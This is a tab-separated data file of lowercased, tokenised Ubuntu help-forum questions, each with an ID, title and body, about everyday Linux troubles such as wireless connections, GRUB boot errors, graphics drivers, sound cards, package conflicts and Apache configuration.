471347	wireless network scan	i just installed with no problems lubuntu on my vaio pocket pc , wireless lan was detected and setup with fine from the beginning . i kept using my wireless connection to properly install updates , new programs , etc . then i took my laptop to different place with available wireless network but i can find the way to connect to it . i have tried several programs and i still can not connect or scan any . physical connection works fine and i 'm using it to write this request . uname -a linux carlos-vgn-p610t 3.13.0-24-generic # 47-ubuntu smp fri may 2 23:31:42 utc 2014 i686 i686 i686 gnu/linux $ iwconfig wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=off retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . ~ $ sudo iwlist wlan0 scan [ sudo ] password for carlos : wlan0 interface does n't support scanning : network is down my original network connection ( `` kiwi '' ) used at the installation step : ls /etc/networkmanager/system-connections conexi贸n inal谩mbrica 1 kiwi could you please let me know some hints to solve this problem , i really need to use wireless connection when working on customer premises .
471349	acer c720 , crouton and an external blu-ray player ?	okay everybody be patient with me as i am not a computer geek , or genius . my question is if i installed ubuntu on my chromebook can i use an external blu ray player to play blu ray movies ? if so , what do i need to do ? download drives , movie keys or what amigos ?
471352	grub help , windows not loading	http : //paste.ubuntu.com/7508074/ in the grub menu windows has two options : sdb1 and sdb2 , neither actually do the whole `` loading windows '' thing . rather , they both give me a purple screen . i 've waited for a few minutes on both so i donât think this is it just taking a while to load but it never does . any help would be great , thanks in advance !
471355	install ubuntu touch on nexus 10 ( manta ) using ubuntu 14.04	fastboot oem unlock results in the tablet displaying the green android robot lying and message saying the device is already unlocked . my presumption is that android os is no longer in the tablet . ubuntu-device-flash -- channel=devel -- bootstrap results in the following : ubuntu icon with various options allowed is displayed . i wait for the command to finish . the command finishes with `` rebooting into recovery to flash '' and at about the same time a spinning ubuntu icon appears . my assumption here is that flashing is occurring . after a bit of time the 4 flashing colors appear . my assumption here is that the flash has failed . i can boot the tablet into recovery which allows me to access the various options as in a ) above . both /factory and /cache are mounted . should they be ? install zip sounds interesting and wipe data/factory reset sounds interesting . i am leery of doing these without advisement . suggestions ? should i do the reload android os procedure from the backup i made and start again ?
471356	still having trouble running zelda classic on ubuntu ?	so i downloaded and extracted zelda classic to my downloads file on my ubuntu 14.04 64-bit laptop . i opened the folder and clicked on zlaunch-l and nothing happened . i checked the properties and it is executable . i selected run software to run the zlaunch-l app again to no effect . i tried selecting it in the terminal but it does n't seem capable of distinguishing the space in the zelda classic folder name and tells me that no folder of path exists . i would like to play zelda on my machine , but i would also like to know how to get apps i download outside of the software center to run . please , somebody help me .
471357	how to password protect my grub 2 menu entries ?	i 'm trying to password protect my grub 2 boot entries . i 've modified the menuentry lines in 10_linux according to the directions i 've read on the web . i 've created users and passwords in 40_custom , and i 've run update-grub . the `` superuser '' i set in 40_custom is recognized and i get asked for a password if i press 'c ' to access the grub prompt . however grub does not ask me for a password when i select one of the menu options . suggestions ? here 's my 10_linux file : http : //privatepaste.com/8c3a457e44 here 's my grub.cfg : http : //privatepaste.com/ce751d6c85
471359	evolution incoming email goes directly to trash , not to incoming list	please help . incoming emails do not show up on the incoming list . they go directly to 'trash ' . did i do something wrong eg filters ?
471360	keyboard backlight only stays on in a light environment	so on my asus laptop ( q501la ) , i can adjust the keyboard backlight with the hotkeys just fine , but the backlight seems to behave opposite to what you would expect - in a dark environment ( like a room with the lights off/dim ) , the backlight turns on when i adjust it , but then fades . however , when i turn on the backlight in a bright room , the keyboard backlight stays on . i guess it 's an ambient light sensor , but right now the keyboard backlight is kinda useless . when i can see the keys fine , it 'll illuminate . when i 'm in the dark and ca n't see my keys as well , the backlight refuses to stay on . i ca n't seem to find any info on this happening , any ideas ?
471361	shared folders vmware	when i go to enable shared folders i get this error unable to update run-time folder sharing status : there was an error mounting shared folders file system inside the guest operating system . i have tried uninstalling and reinstalling vmware tools and i still get the same error .
471364	when the system resumes the default route is missing	a notebook running ubuntu 13.10 ( xfce ) , using wifi , and until recently when i shut the lid down it suspended nicely , and when i opened the lid it resumed , and auto-connected to the wifi . now it no longer works . after opening the lid it resumes fine , but i have no internet . i need to manually disconnect , then re-connect , wifi . however , after some troubleshooting , i find that in fact it is still auto-connecting to wifi okay ( e.g . i can ping the wifi router , but ping beyond the router fails ) . so , what seems to be wrong is the route table . here is the output of route -n before suspend : kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 172.16.1.50 0.0.0.0 ug 0 0 0 wlan0 172.16.0.0 0.0.0.0 255.255.0.0 u 9 0 0 wlan0 and here is it after resume : kernel ip routing table destination gateway genmask flags metric ref use iface 172.16.0.0 0.0.0.0 255.255.0.0 u 9 0 0 wlan0 i.e . the default route is being lost . it comes back after doing a manual disconnect and reconnect . just one thing changed recently : i went into the bios and switched off `` wake on lan '' . could there be a connection between wake-on-lan bios setting and the route table not being configured properly during a resume ? **update : i changed the bios setting back , and the problem appears to have gone away . but why ? ? ** i 've been through the syslog and i 'm not spotting any obvious errors in the suspend/resume stage . update : i moved to another lan . it did not auto-detect the new lan , and had the connection information for the previous lan still there . so , i guess i can rephrase the problem as : wifi connection renewal is not happening any more when power is resumed . ** update # 2 ** : for anyone else with this issue , there are some ideas at : http : //ubuntuforums.org/showthread.php ? t=2004690 ( i 've not tried them . even though it seems crazy , and should n't have any effect , switching back to wake-on-lan in the bios appears to have fixed it . )
471365	error during installing skype , software update and while starting ubuntu	when installing skype on ubuntu 12.04 lts gets the following error $ sudo dpkg -- add-architecture i386 [ sudo ] password for shailendra : dpkg : error : unknown option -- add-architecture type dpkg -- help for help about installing and deinstalling packages [ * ] ; use `dselect ' or `aptitude ' for user-friendly package management ; type dpkg -dhelp for a list of dpkg debug flag values ; type dpkg -- force-help for a list of forcing options ; type dpkg-deb -- help for help about manipulating *.deb files ; options marked [ * ] produce a lot of output - pipe it through `less ' or `more ' ! $ sudo dpkg -- add-architecture i386 sudo : dpkg -- add-architecture : command not found my ubuntu is 12.04 lts os type 64 bit trying to install it through commands sudo dpkg -- add-architecture i386 it gives the above mentioned error also while software updates getting message locale : can not set lc_ctype to default locale : no such file or directory lc_messages , lc_all no such file or directory i have an error at the start before entering my identity to start ubuntu the disc2 drive for /dev/mapper/cryptswap1 not mounted or unmount
471373	openvpn server without port forwarding	i followed the instructions on this tutorial for setting up my openvpn server but i have no access to my router ( do n't know the password ) , so i ca n't forward port 1994 . is there a way to connect to my openvpn server without port-forwarding ? i 've tried changing the port to 8080 , 80 , also tried tcp and udp but nothing works . i get connection timed out for tcp and tls key negotiation failed to occur within 60 seconds for udp . i know the vpn server is working because i can connect a lan client ( using lan ip address ) , and i know the wan address is ok . it seems that the only open-port i have is 8080 ; 80 and 443 are closed .
471374	only part of my startup script gets executed	i have a script located under /etc/profile.d that executes when i login via the gui . all i need this script to do is connect to my pptp server with a single command which runs flawlessely when i manually run it from the terminal . i know the script is executing because to test it i added a part that creates a directory on my desktop which showed up when i rebooted the machine ... but for some reason it is refusing to run the command that connects to the vpn . thanks for the help .
471375	mouse bug ? ubuntu 12.04 acts as if i clicked the mouse when i did n't just after move	i have a strange problem . i can not tell whether it is option someone might want but i do n't or broken hardware etc . every time i move the mouse and then wait a second any program will act as if the mouse was clicked , eg . move over a button but do n't click , then wait a second and the program will act as if the button was clicked . it is extremely frustrating often causing focus to shift unexpectedly or firing off buttons i was just moving the mouse over . i have swapped to several different mice and they all act the same . does anybody have any idea what could cause this ?
471376	ligthdm crashing any suggestions how to fix it ?	i am using ubuntu 14.04 64bit my lightdm keeps crashing quite often . any suggestions how to fix it ? thanks ,
471380	overclocking , sensibly for a novice	motherboard is an ecs c51gm-m processor is an amd athlon 64 x2 3800+ ive read many articles and have zero experience compiling software installs on ubuntu ( a learning link would be a lovely message ) but heres what i want to know i know bios is at most almost not involved in linux o.s . i am wondering if theres a reliable program or app that will allow me to overclock my cpu oh and before im asked yes i have 4gigs of ddr2 ram and a cpu cooling fan that takes up most of the case any answers are greatly appreciated thanks
471384	ssh login display	so i enabled the banner which displays a nice ascii art text for me . once i enter my password , some system stats come up , my last login info , and this is where the server tells me if there are updates . how do i edit this portion ? i want to potentially add more stuff to this output .
471392	how to respond to question in output of debian-installer	when installing ubuntu server 14.04 , the installer stops in the step select and install software at 67 % . when i have a look at vc4 i see that a question about the replacement of a file is in the output of `` in-target '' ( https : //bugs.launchpad.net/ubuntu/+source/debian-installer/+bug/1322755 ) . despite that this situation should not occur how do i answer this question to proceed with the installation ? edit : i uploaded a photo of the log output https : //launchpadlibrarian.net/176607422/log.jpg ( i ca n't embed this , due to insufficient reputation )
471393	sms on usbmodem	hie , i am using mmx352g modem to connect to internet.i have configured and installed it on ubuntu 13.04 . next what to do to send and receive messages as we do in windows ? ? to send ussd code like *123 # to check balance ?
471397	i installed ubuntu removing windows 8 and now i am not able to see my other drives	i installed ubuntu 14.04 on the drive on which there was windows 8 installed previously . i formatted that partition first and later installed ubuntu in it . i had 5 partitions excluding windows partition . i did not touch them but now in ubuntu , i am not able to see them . can anyone please tell me how can i see and access my those partitions ? i have a single hdd having 5+1 partitions . name maj : min rm size ro type mountpoint sda 8:0 0 298.1g 0 disk ├─sda1 8:1 0 296.1g 0 part / ├─sda2 8:2 0 1k 0 part └─sda5 8:5 0 2g 0 part [ swap ] sr0 11:0 1 1024m 0 rom
471398	how to recover partition that is lost while installing ubuntu	i am very new to ubuntu , and in the anxiety to install ubuntu ended up doing a big mistake . while installation , i chose to overwrite my current windows 7 os ; and thought that it would only format my c : however , after installation , i have found that all my partitions are deleted and data lost . is there a way to recover those data ? i have searched across the forums , and found out about testdisk . however , i need a very detailed step by step guide , as i completely new to ubuntu . some of the steps in various tutorials i found seem too advanced to me . any help would be highly appreciated .
471400	ubuntu precise 12.04 kernel headers	recently , on my installation of ubuntu precise 12.04.3 on my beaglebone black , while tying to install some wifi drivers , it says it requires kernel headers . the kernel version is 3.8.13-bone30 ( from uname -r ) , but i have no idea how to get the right kernel headers . i have done a bit of searching and there does n't seem to be much , if anything , to go on . so could anyone help me out as to how to do it ? thanks
471401	xrandr is being overriden , nvidia optimus dual screen setup	i have a lenovo w530 , with optimus . i am running 14.04 , using the nvidia driver . i can get to the point where awesome boots , and xrandr can see all of my screens . my setup uses this : http : //us.download.nvidia.com/xfree86/linux-x86/319.12/readme/randr14.html when i run an xrandr command to set up my screens as i wish : xrandr -- output lvds-1-0 -- auto -- output dp-0 -- mode 1680x1050 -- right-of lvds-1-0 -- verbose i get the following : crtc 0 : 1680x1050 60.0 +1920+0 `` dp-0 '' crtc 4 : 1920x1080 60.0 +0+0 `` lvds-1-0 '' which looks ok . i think that means that dp-0 is given the resolution 1680x1050 and offset by 1920px , which is what i want . however , in the xorg.0.log file , the following is appended : [ 121.934 ] ( ii ) nvidia ( gpu-0 ) : display ( benq bl2201 ( dfp-1 ) ) does not support nvidia 3d [ 121.934 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 121.965 ] ( ii ) nvidia ( gpu-0 ) : display ( benq bl2201 ( dfp-1 ) ) does not support nvidia 3d [ 121.965 ] ( ii ) nvidia ( gpu-0 ) : vision stereo . [ 121.965 ] ( ii ) modesetting ( g0 ) : edid vendor `` len '' , prod id 16562 [ 121.965 ] ( ii ) modesetting ( g0 ) : printing ddc gathered modelines : [ 121.965 ] ( ii ) modesetting ( g0 ) : modeline `` 1920x1080 '' x0.0 139.00 1920 1980 2028 2050 1080 1090 1100 1130 -hsync -vsync ( 67.8 khz ep ) [ 121.965 ] ( ii ) modesetting ( g0 ) : modeline `` 1920x1080 '' x0.0 115.83 1920 1980 2028 2050 1080 1090 1100 1130 -hsync -vsync ( 56.5 khz e ) [ 121.996 ] reporting 7 10 51 392 [ 122.018 ] ( ii ) nvidia ( 0 ) : setting mode `` dp-0 : nvidia-auto-select @ 1680x1080 +1920+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } '' [ 122.101 ] ( ii ) nvidia ( 0 ) : setting mode `` dp-0 : nvidia-auto-select @ 3600x1080 +0+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } '' [ 122.184 ] reporting 7 10 51 392 [ 122.192 ] reporting 7 10 51 392 [ 122.209 ] reporting 7 10 51 392 [ 122.210 ] reporting 7 10 51 392 [ 122.210 ] reporting 7 10 51 392 [ 122.210 ] reporting 7 10 51 392 [ 122.210 ] reporting 7 10 51 392 [ 122.211 ] reporting 7 10 51 392 [ 122.211 ] reporting 7 10 51 392 [ 122.211 ] reporting 7 10 51 392 [ 122.212 ] reporting 7 10 51 392 [ 122.212 ] reporting 7 10 51 392 and the secondary screen is set to 3600x1080 resolution , with no offset , so a weird sort of clone .
471402	external monitor is not detected in ubuntu 12.04 ( detected as laptop )	i 've been trying to extend my dell s2340l monitor to my lenovo y510p laptop . it clones the display fine but does not extend it , it can not detect it . nvidia x server settings is also somewhat different ( no x server display configuration ) . what is the problem and how can i fix it ? thank you . lspci | grep vga 00:02.0 vga compatible controller : intel corporation 4th gen core processor integrated graphics controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gk107m [ geforce gt 750m ] ( rev a1 )
471403	gnome-panel crashed , and now wo n't load in gnome flashback ( metacity and compiz )	i installed gnome flashback earlier today because i prefer the old interface . while surfing the web earlier , gnome-panel crashed . i thought it would be no big deal , but it did n't come back like i expected , so i rebooted . ever since , i have been unable to get it to launch . i can access unity fine ( posting from unity right now ) , but both metacity and compiz gnome flashback sessions log in , show my wallpaper , and my start-up apps load , but no gnome-panel . i 've uninstalled and re-installed gnome-session-flashback ( purged on uninstall ) , no luck . yes , i even tried turning it off and on again ( sorry , had to throw that in there ) . /var/log/syslog says that gnome-panel.desktop was killed with signal 6 , and ~/.xsession-errors shows that indicator-application main process ended ( 2x ) and then says it stopped trying to respawn it . has anyone seen this issue , and if so , is there a solution ? thanks in advance !
471407	error in named configuration	i am getting the following error while starting named service after configuring dns . pls help [ root @ server ~ ] # service named start starting named : error in named configuration : zone appistoki.com/in : loading from master file forward.zone failed : file not found zone appistoki.com/in : not loaded due to errors . _default/appistoki.com/in : file not found zone localhost/in : loading from master file named.localhost failed : file not found zone localhost/in : not loaded due to errors . _default/localhost/in : file not found zone 1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.ip6.arpa/in : loading from master file named.loopback failed : file not found zone 1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.ip6.arpa/in : not loaded due to errors . _default/1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.ip6.arpa/in : file not found zone 1.168.192.in-addr.arpa/in : loading from master file reverse.zone failed : file not found zone 1.168.192.in-addr.arpa/in : not loaded due to errors . _default/1.168.192.in-addr.arpa/in : file not found zone 0.in-addr.arpa/in : loading from master file named.empty failed : file not found zone 0.in-addr.arpa/in : not loaded due to errors . _default/0.in-addr.arpa/in : file not found
471412	eclipse and java 7 but no javac ?	i have a java computer program that i can compile in eclipse just fine . i want to compile it from the command line and get the message javac not found . i figured that i just did n't have my path setup right , but then i did a locate javac and i only get : /usr/share/bash-completion/completions/javac /usr/share/vim/vim74/compiler/javac.vim /usr/share/vim/vim74/syntax/javacc.vim and it does not exist in /usr/lib/jvm/java-7-openjdk-amd64/bin/ in eclipse , it looks like it is using this jdk , so i am not sure how to account for how eclipse compiles . am i missing something silly ? thanks .
471413	why is my server ( 12.04 lts ) catching up on a missed cronjob when woken over lan ?	... or what else is happening here ? my homeserver running 12.04 lts server is running on a wake/sleep schedule . i have a script `` hibernate-starter '' being run by root 's crontab at specific times . the script is running some checks ( is rsync running , is someone watching tv , is there a pvr recording going on , is a wakelock set , etc . ) and goes exit 1 if catching one check . because of that , the script is to be run again after one hour as long as it makes still sense , to try again if something was going on at the previous try . this is what my regular schedule looks like : 5 22,23 * * 0-4 / ... /hibernate-starter 05:15 5 0-3 * * 1-5 / ... /hibernate-starter 05:15 5 7-12 * * 1-4 / ... /hibernate-starter 15:30 5 7-10 * * 5 / ... /hibernate-starter 13:00 5 0-5 * * 0,6 / ... /hibernate-starter 08:00 if everything 's set for sleeping , we compare the given wake-up time vs. the next scheduled pvr recording , take the earlier of the two , give it to rtcwake and go /usr/sbin/pm-hibernate . now if noones taking any action , the server wakes at the specified time and runs as planned . however , if i wake the server by sending a wake on lan magic packet - or just pushing the hardware button - , it sometimes ( ca n't clearly reproduce ) runs the hibernate script again during early wakeup despite being completely off schedule . for example , the script ran about 15sec after sending the magic packet at -- 2014-05-23 08:17:06 -- . i can see this is quite early in the resume process because the tv service is not even started at that point and consequently not responding to my checks , which i can see from the script 's log file . all checks run through and the server goes back to sleep immediately with the wakeup time defined by the crontab . now if i send another wakeup signal , the server will wake up and stay awake . so , why is the script run at those unexpected times ? how can i stop this ?
471414	google chrome messed icons and fonts	strange things happen to my google chrome ( 35.0.1916.114 ) in ubuntu 14.04 lts . before after as you can see icons and fonts are different and also tab styles changed . sometimes after system start fonts all over ubuntu are different . restart usually solves desktop fonts , but chrome ( and also chromium ) are still messed . i also noted chrome 's `` indicator '' icon in toolbar . i am using standard google repository ( http : //dl.google.com/linux/chrome/deb/ ) . can anyone please help me how to solve this ?
471417	edit video files without reconversion	i need to cut , delete unwanted parts , change scene sequence and save videos without reconversion . are there any application for ubuntu 14.04 ? . ex : there is a software for windows called avs video remaker . thanks
471418	how to close help in vim	i wrote : help x11-selection on vim . help appear for that command . now my vim screen split to two part first is the vim help below that there is my previous text file . now i want to come back to my text file or better to say i want to hide help window so how ?
471423	block internet access to my client systems in my lan	i have installed ubuntu 12.04 server in hp server hardware with 2 nics . i have configured internet using nat and is working fine . my problem is , i want to block some system from internet only . can anyone help me ? thanks in advance
471425	scale title bars and menu in ubuntu 14.04 with gnome	i 've installed gnome in my new 14.04 ( not the ubuntu-gnome distribution ) . i 've noticed the title bars are huge though , and i would like to change . the things is that this solution from here is not available for me : go to system settings . go to displays . go to `` scale for menu and title bars . '' drag the slider to your preferred size . is there somewhere else i could change this ? i looked in gnome-tweak-tool and also ubuntu-tweak-tool without success .
471426	wlan not showing/working in ubuntu 12.04	can someone please help me with my wlan issue ? please see the terninal output below : yaeman @ yaeman-toolbox : ~/desktop/iwl_firmware $ ifconfig eth0 link encap : ethernet hwaddr a4:5d:36:16 : c9:35 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:1518 errors:0 dropped:0 overruns:0 frame:0 tx packets:1518 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:138138 ( 138.1 kb ) tx bytes:138138 ( 138.1 kb ) . yaeman @ yaeman-toolbox : ~/desktop/iwl_firmware $ iwconfig lo no wireless extensions . eth0 no wireless extensions . usb0 no wireless extensions .
471428	is it normal for a properties dialog box `` contents '' to fluctuate for a very long time ?	i have a number of external hdds . there are two in this example which are the original and its rsync duplicate , and i want to check and compare the file structure . i have used the contextual menu to show properties for a number of directories on each hdd , and it has apparently been calculating the contents for a couple of hours . interestingly , the contents quantity and size fluctuates up and down . for example , one of the volumes will say 18,195 items totalling 10.6gb , then 8,445 items totalling 1.2tb , then 21,237 items totalling 530.2gb , then 4,556 items totalling 1.6gb , and so on , all within 20 seconds . ubuntu 14.04
471430	creative sb audigy sound card not working after recent update to 14.04	my sound card has worked happily at 12.04 , 13.10 and worked with the upgrade to 14.04 in april . after recent update i have no sound . i have followed a number of suggestions on this site - e.g . adding my user to the audio group , removing , purging and reinstalling alsamixer . alsamixer crashes if i run it from unity and select option to edit sound card . i can run alsamixer -c -1 from terminal and it will run but the sb card does n't show . when booting up , there is a message before the logon screen which saying something like `` ca n't grab x00000f0 , etc , etc , memory locations , mixer removed '' this must be significant but i have no idea what is going on . i am very much a newbie at linux . would be grateful for help . andrew .
471431	no operating systems detected error	i 'm trying to install ubuntu ( 14.04 ) alongside with windows 8.1 . i have four partitions on the disk . the fourth one is empty with space 71 gb . i 'm hoping to install ubuntu here . but when i 'm trying to install , i 'm getting the error no operating systems found . i tried using fixparts but it would n't work.it gives the following error : this disk appears to be a gpt disk . use gnu parted or gpt fdisk on it ! exiting ! please help me to fix this .
471432	opengl/3d acceleration / working graphics driver on ubuntu 14.04 on macpro6,1 ( black cylinder )	followed user282366 post and guide : mac pro cylinder ubuntu install had anybody had any luck in getting opengl/3d acceleration working and not having a blank screen with the following text _ on top left of screen i have tried radeon/firepro and catalyst drivers . have d500 ( 3gb ) in my macpro and have monitor attached to both hdmi and thunderbolt/displayport ports .
471433	sound card not detecting	i recently tried to install realtek audio driver . procedure was completed successfully but when i rebooted system after installing my sound cards are not detecting and system is muted . later i tried to take system back to original state with the steps given in following link http : //ubuntuforums.org/showthread.php ? t=1723051 that steps are also completed . my system status that are generated during that procedure is in following link http : //www.alsa-project.org/db/ ? f=d3e2cea4c324bd73c0df0d51e473b5d9581af282 please any one can solve this problem ?
471436	after update , can see connections , but ca n't connect	recently i installed lubuntu and everything was fine until i updated it . suddenly i lost connection to the internet and i ca n't connect since ( but connection was fine for a few minutes after rebooting right after updating ) . i can see my network but when i click to connect nothing is happening . i 've tried to look for solution , but nothing worked . i 'll be very greatfull for any help or advice . here 's some information which i think are usefull ( based on my research ) . my system : ubuntu 14.04 lts $ lspci -nnk | grep -ia2 net 09:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1030 [ rainbow peak ] [ 8086:008a ] ( rev 34 ) subsystem : intel corporation centrino wireless-n 1030 bgn [ 8086:5325 ] kernel driver in use : iwlwifi $ rfkill list all 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no if you need any more information , please tell me . wireless script result : http : //pastebin.ubuntu.com/7510836/ i want to add that i have windows 7 also on this machine and i do n't have any problem with wireless . also , i 've tried running lubuntu directly from cd and i had no problem with connection aswell . the problem started after updating system . and also , the problem started right after installing gcc , but i do n't think that 's connected : )
471437	unable to install apache openoffice 4.1 on ubuntu 14.04	i am using edubuntu os and upgraded it to ubuntu 14.04 . but , i am not able to install apache openoffice 4.1 . it gives error , 'bad package ' . whereas , i could install it on windows within 50 minutes and also using it . open source platform purpose is not solved unless open software run properly on free os also .
471438	`` game must be in the same directory '' error using wine	i installed wine 1.6 on my ubuntu 12.04 lts and downloadeded project igi 1 . however , by right clicking and opening it with wine windows program loader , i get an error saying game must be in the same directory . how do i resolve this ?
471440	unable to acces sound settings	iâm unable to access the sound settings in u1404 tt . before updating to ubuntu 14.04 , with right click and system setting i had access to some settings which allowed me to set different sound levels for different application . now i 'm unable to do that . click on sound settings send me to a setting window where sound settings are not available . actually , as you can see , my system settings menu is quite reduced ( no options for keyboard ) .
471441	problem detecting multiple nvidia gpus on ubuntu 12.04 lts	i am a former windows user now working with ubuntu in telecom sector . i am currently building a gpgpu cluster . my system can not detect all of my gpu cards . when i run only one card , i am fine but when i add the second and third cards i get all sorts of problems . most common error when running devicequerydrv cuda_error_invalid_device ( device specified is not a valid cuda device ) while running devicequery i get cudagetdevicecount returned 10 - > invalid device ordinal nvidia-settings can only detect 2 cards my system has the following configuration ubuntu 12.04 lts cuda 6.0 nvidia gtx 660 ti ... three of these cards ... 16 gb ram z87 formula oc asrock mobo if you need any additional information please let me know . any help would be greatly appreciated . it will only add to my phenomenal learning curve with ubuntu and open source .
471445	connection issue with ubuntu server 12.04 lts	i have a strange issue with my ubuntu server 12.04 lts . following is what i have : samba server ubuntu gui installed static ip address i took the server off-line for about say 1-2 months for maintenance in the house . afterwords when i re-connect it . server does not connect to internet nor to the lan . i checked the eth1 from command menu and from gui and its in tact . there is no changes . but somehow it does not work ... . any idea what should i do ?
471447	cpu temperature unit ?	since i am not an american , the following command outputs for example `55000 ' which means 55째c . cat /sys/class/thermal/thermal_zone1/temp does this command output the temperature in fahrenheit for computers which are configured us.en ?
471455	running thunar custom actions in a directory located at afc : //	i am running xubuntu 14.04 . i have an iphone 5 with ios 7.1 i can mount the phone and see my photos and videos . i can drag the photos and videos to another directory in home and then manipulate them . i 'd rather be able to choose a custom action to manipulate the photos and videos then copy or move them to home . ( it would be ok to use a custom action to move them and then manipulate them . ) the problem is that i do not know how to run a script or perform a custom thunar action on a directory that is located at : afc : //6a244e0b3a6637cff9cf954d83a2fbf1faa0c2aa/dcim/103apple/ in earlier versions of ubuntu i was able to use the .gvfs location in a script , but that no longer seems to be available in 14.04
471466	what should i check for long pause between after grub and boot	fresh installed ubuntu 14.04 pauses on boot time between after pressing enter on grub menu ( it disappears and cursor blinks on blank screen ) and boot . i did fresh install again but nothing changed . what should i check for this long ( ~60sec . ) pause ? or what can be cause like this type of pause ? some info : problem is alive on desktop machine . there is no wireless device attached to machine . it does not related disk type . i do fresh install both hdd and ssd , result is the same .
471470	simplecv error after reinstalling ubuntu 14.04	i 'm not sure if it 's a problem of simplecv or ubuntu itself . any hints ? what is svgwrite ? error : traceback ( most recent call last ) : file `` /usr/local/bin/simplecv '' , line 9 , in < module > load_entry_point ( 'simplecv==1.3 ' , 'console_scripts ' , 'simplecv ' ) ( ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 351 , in load_entry_point return get_distribution ( dist ) .load_entry_point ( group , name ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 2363 , in load_entry_point return ep.load ( ) file `` /usr/lib/python2.7/dist-packages/pkg_resources.py '' , line 2088 , in load entry = __import__ ( self.module_name , globals ( ) , globals ( ) , [ '__name__ ' ] ) file `` /usr/local/lib/python2.7/dist-packages/simplecv/__init__.py '' , line 4 , in < module > from simplecv.camera import * file `` /usr/local/lib/python2.7/dist-packages/simplecv/camera.py '' , line 5 , in < module > from simplecv.imageclass import image , imageset , colorspace file `` /usr/local/lib/python2.7/dist-packages/simplecv/imageclass.py '' , line 14768 , in < module > from simplecv.drawinglayer import * file `` /usr/local/lib/python2.7/dist-packages/simplecv/drawinglayer.py '' , line 5 , in < module > import svgwrite importerror : no module named svgwrite
471471	apache mod_jk not working	i installed the jk module for apache2 and it is enabled ( i checked in webmin ) . i edited my virtual host configuration file and added this line : jkmount /myweb worker1 workers.properties : worker.list=worker1 worker.worker1.type=ajp13 worker.worker1.host=localhost worker.worker1.port=8080 i deployed myweb in a tomcat server running on port 8080 . however when browsing to localhost/myweb it 's just loading the index from the apache directory root , it is not redirecting to the app deployed in the tomcat . am i missing some configurations ?
471475	apache alias not working	i defined the following alias alias /static/images /images however when i browse to localhost/myweb/static/images i am getting : not found the requested url /myweb/static/images was not found on this server . why is n't it redirecting to localhost/myweb/images ?
471476	xubuntu : conky runs multiple instances at boot	i have a .conkyrc file in my ~/ directory . conky seems to run of its own accord upon starting my session - and it does so with 2 or more instances , all directly laid on top of one another . and often as not , no conky starts at all ! i do not have a startup script configured that 'calls ' conky . neither do i have a 'saved session ' - and xfce is set to not save session upon logging out . anyone else experience this undesirable conky behaviour ? how did you fix it ? cheers - steven .
471477	unmet dependencies libc++	how should i correctly install clang 's c++ library ( with stl ) on my lubuntu machine ? i want to use clang and its c++ library because it offers better support for the upcoming c++14 standard . when trying to install libc++ : sudo apt-get install libc++ i get : < ! -- fairly large amount of installed/up-to-date packages which i removed from the post -- > some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libcgi-application-plugin-captcha-perl : depends : libdata-random-perl but it is not going to be installed libcloog-isl-dev : conflicts : libcloog-ppl-dev but 0.16.1-5 is to be installed libclutter-gst-2.0-doc : conflicts : libclutter-gst-doc but 1.6.0-2build1 is to be installed libcuda1-304 : conflicts : libcuda-5.0-1 libcuda1-304-updates : conflicts : libcuda-5.0-1 libcuda1-331 : breaks : libcuda-5.0-1 breaks : libcuda-5.5-1 libcuda1-331-updates : breaks : libcuda-5.0-1 breaks : libcuda-5.5-1 libcunit1-ncurses : conflicts : libcunit1 but 2.1-2.dfsg-1 is to be installed libcunit1-ncurses-dev : conflicts : libcunit1-dev but 2.1-2.dfsg-1 is to be installed libcurl4-gnutls-dev : conflicts : libcurl4-nss-dev but 7.35.0-1ubuntu2 is to be installed conflicts : libcurl4-openssl-dev but 7.35.0-1ubuntu2 is to be installed libcurl4-nss-dev : conflicts : libcurl4-gnutls-dev but 7.35.0-1ubuntu2 is to be installed conflicts : libcurl4-openssl-dev but 7.35.0-1ubuntu2 is to be installed libcurl4-openssl-dev : conflicts : libcurl4-gnutls-dev but 7.35.0-1ubuntu2 is to be installed conflicts : libcurl4-nss-dev but 7.35.0-1ubuntu2 is to be installed e : unable to correct problems , you have held broken packages . i am running lubuntu 14.04 on a samsung series 9 ultrabook . i do n't understand the conflicts , especially the ones related to cuda , which is supposed to be only for systems with an nvidia gpu . please let me know what other information i need to provide . edit : after some trying around , i installed the libc++-dev package : sudo apt-get install libc++-dev this installed the header files which clang now finds and uses . this does n't answer the original question of why apt-get attempted to install libc++ which apparently does n't exist and why it got into conflicts ( whith cuda of all things ! ) .
471478	boot error message , grub rescue mode	when turning on my computer i get this error message . error : file '/boot/grub/i386-pc/boot.mod ' not found while booting . i recently updated to 14.04 , so not sure if this is the problem ? where can i go from here ? any help would be greatly appreciated . thanks
